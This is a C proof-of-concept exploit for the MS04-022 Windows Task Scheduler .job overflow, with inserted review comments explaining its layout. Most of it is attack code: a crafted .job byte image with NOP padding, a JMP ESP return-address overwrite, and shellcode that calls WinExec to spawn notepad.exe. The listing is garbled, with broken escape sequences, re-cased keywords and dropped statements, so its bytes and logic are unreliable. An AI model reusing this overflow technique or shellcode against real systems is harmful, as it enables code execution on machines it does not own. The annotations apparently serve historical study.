Microsoft Windows 2KXP Task Scheduler .job Exploit (ms04-022)


Code:

// ******************************************************** ************

// Microsoft Windows 2K / XP Task Scheduler Vulnerability (ms04-022)

// proof-of-concept exploit for English WinXP SP1

// 15 jul 2004

//

// Running this will create a file "j.job". When explorer.exe or any

// File-Open dialog box accesses the directory containing this file,

// notepad.exe will be spawned.

//

// Greetz: Snooq, SK and All Guys At Sig ^ 2 WWW Security Org SG

//

// ******************************************************** ************

#include

#include

// NOTE(review): this listing is a garbled paste -- escape sequences appear
// as "/ xNN" instead of "\xNN", keywords and identifiers have been re-cased,
// and some quotes have moved (see the line marked "JMP ESP LANDS HERE").
// It does not compile as shown; read it as a historical record of the
// MS04-022 PoC, not as buildable code.
//
// jobfile: byte image of the crafted .job file that main() writes out.
// As laid out here: a short header, a long run of 0x90 padding, a 4-byte
// value the original comment labels as a JMP ESP address, a 2-byte short
// jump, then filler and trailing header-like bytes. main() copies the
// shellcode array over part of this image before writing it, so the bytes
// below are not the final file contents.
Unsigned char jobfile [] =

"/ X01 / X05 / X01 / X00 / XD9 / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF"

"/ xff / xff / xff / xff / x46 / x00 / x92 / x00 / x00 / x00 / x00 / x00 / x00 / x0a / x00"

"/ x20 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x03 / x13 / x04 / x00"

"/ xc0 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00"

"/ x00 / x00 / x00 / x00 / x00 / x00 / x3a / x00 / x5c / x00 / x61 / x00"

"/ x2e / x00 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / x00"

// 0x90 (NOP) padding -- the region main() later overwrites with shellcode
// starts inside this run (offset 31*16 in the original, see main()).
"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x78 / x00 / x00 / x78 / x00 / x79 / x00 / x79 / x00 / x79 / x00 / x79 / x00"

"/ x7a / x00 / x00 / x7a / x00 / x7b / x00 / x7b / x00 / x7b / x00"

// Return-address overwrite. The original labels it "JMP ESP in Samlib"
// (presumably samlib.dll, English WinXP SP1); the value is build-specific
// and is what made this PoC a single-target exploit.
"/ X5B / XC1 / XBF / X71" // JMP ESP in Samlib WinXP SP1

"/ x42 / x42 / x42 / x42 / x43 / x43 / x43 / x43 / x44 / x44 / x44 / x44" / x90 / x90 "// JMP ESP LANDS HERE

"/ Xeb / x80" // jmp onward import ing shellcode (garbled; presumably a short backward jmp into the shellcode)

"/ x61 / x00 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00"

"/ x61 / x00 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00"

"/ x61 / x00 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00"

"/ x61 / x00 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00"

"/ x61 / x00 / x00 / x20 / x20 / x20 / x20 / x20 / x20 / x20"

"/ x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20"

"/ x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20"

"/ x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20"

"/ x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20"

"/ x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20"

"/ x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20"

"/ x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20"

"/ x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20"

"/ x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20 / x20"

"/ x20 / x20 / x00 / x00 / x00 / x00 / x04 / x00 / x44 / x00 / x3a / x00"

"/ x5c / x00 / x00 / x00 / x00 / x75 / x00 / x65 / x00 / x73 / x00 / x74 / x00"

"/ x31 / x00 / x00 / x00 / x00 / x00 / x03 / x13 / x04 / x00 / x00 / x00"

"/ x00 / x00 / x00 / x00 / x00 / xd4 / x07 / x07 / x00 / x0f / x00 / x00 / x00"

"/ x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00"

"/ x00 / x00 / x00 / x00 / x00 / x01 / x00 / x00 / x00 / x00 / x00 / x00 / x00"

"/ x00 / x00 / x00 / x00";

/*
 * HARMLESS PAYLOAD THAT SPAWNS 'NOTEPAD.EXE' ... =P
 * Ripped from Snooq's Winzip Exploit
 */

// shellcode: the payload that main() patches and then copies into the
// jobfile image. Per the original per-line comments it builds the string
// "notepad.exe" on the stack and calls two addresses that main() fills in
// at the "XXXX" (WinExec) and "YYYY" (ExitProcess) placeholders, matched
// as 0x58585858 and 0x59595959. The bytes are garbled in the same way as
// jobfile ("/ xNN" for "\xNN").
//
// NOTE(review): the placeholders below appear lowercase ("xxxx"/"yyyy");
// lowercase 'x' is 0x78, not 0x58, so as printed they would never match
// the checks in main(). Presumably a casing artefact of the paste.
Unsigned char shellcode [] =

"/ x33 / xc0" // xor eax, eax // slight modification to move ESP up

"/ xb0 / xf0" // mov al, 0F0h

"/ x2b / xe0" // sub esp, eax

"/ x83 / xe4 / xf0" // and esp, 0FFFFFFF0h

"/ x55" // push ebp

"/ x8b / xec" // mov ebp, esp

"/ x33 / xf6" // xor esi, esi

"/ x56" // push esi (string terminator)

"/ x68 / x2e / x65 / x78 / x65" // push 'exe.'

"/ x68 / x65 / x70 / x61 / x64" // push 'dape'

"/ x68 / x90 / x6e / x6f / x74" // push 'ton' (0x90 instead of 0x00 to avoid a NUL byte)

"/ x46" // inco (garbled; presumably inc esi)

"/ x56" // push esi

"/ x8d / x7d / xf1" // lea edi, [ebp-0xF]

"/ x57" // push edi

"/ xb8xxxx" // mov eax, XXXX -> WinExec() (address patched in by main)

"/ XFF / XD0" // call eax

"/ x4e" // dec esi

"/ x56" // push esi

"/ xb8yyyyy" // mov eax, YYYY -> ExitProcess() (address patched in by main)

"/ XFF / XD0"; // call eax

// main: resolves the two API addresses into the shellcode placeholders,
// copies the shellcode into the jobfile image, writes the image to "j.xxx"
// and renames it to "j.job". Observable artefacts of a run are those two
// files in the working directory and, on a vulnerable parser, notepad.exe
// spawned by whatever process reads the .job file.
//
// NOTE(review): the listing is garbled (re-cased keywords, a dropped
// increment, a dropped call). Defects visible even so:
//  - the while (*ptr) scan stops at the first 0x00 byte; the patched
//    addresses are written in place and then scanned over, so a zero byte
//    in the first address would end the loop before the second placeholder.
//  - *(long *)ptr reads and writes 4 bytes through an unsigned char
//    pointer at arbitrary offsets: unaligned and an aliasing violation;
//    memcpy would be the portable form.
//  - the memcpy into the jobfile image has no check that
//    31*16 + sizeof shellcode - 1 stays within sizeof jobfile - 1.
//  - fwrite, DeleteFile and MoveFile return values are not checked.
Int main (int Argc, char * argv [])

{

Unsigned char * ptr = (unsigned char *) shellcode;

While (* PTR) // terminates at the first zero byte, including one introduced by the patch below

{

IF (* (long *) PTR) == 0x58585858) // 'XXXX' placeholder for WinExec

{

* ((long *) PTR) = (long) getProcaddress ("kernel32.dll"), "Winexec"); // garbled; presumably GetProcAddress(GetModuleHandle("kernel32.dll"), "WinExec")

}

IF (* ((long *) PTR) == 0x59595959) // 'YYYY' placeholder for ExitProcess

{

* ((long *) PTR) = (long) getProcadDress ("kernel32.dll"), "EXITPROCESS"); // garbled; presumably the same GetProcAddress form with "ExitProcess"

}

PTR ; // garbled; presumably ptr++

}

File * fp;

fp = fopen ("j.xxx", "wb"); // written under a temporary name, then renamed to j.job below

IF (fp)

{

Unsigned char * ptr = jobfile (31 * 16); // garbled; presumably jobfile + 31*16 -- no bounds check against sizeof jobfile

Memcpy (PTR, Shellcode, Sizeof (Shellcode) - 1); // drops the terminating NUL; overlays the shellcode onto the 0x90 run

FWRITE (Jobfile, 1, SizeOf (Jobfile) -1, FP); // return value unchecked

Fclose (fp);

Deletefile ("j.job"); // return value unchecked

Movefile ("j.xxx", "j.job"); // return value unchecked

}

Return 0;

}

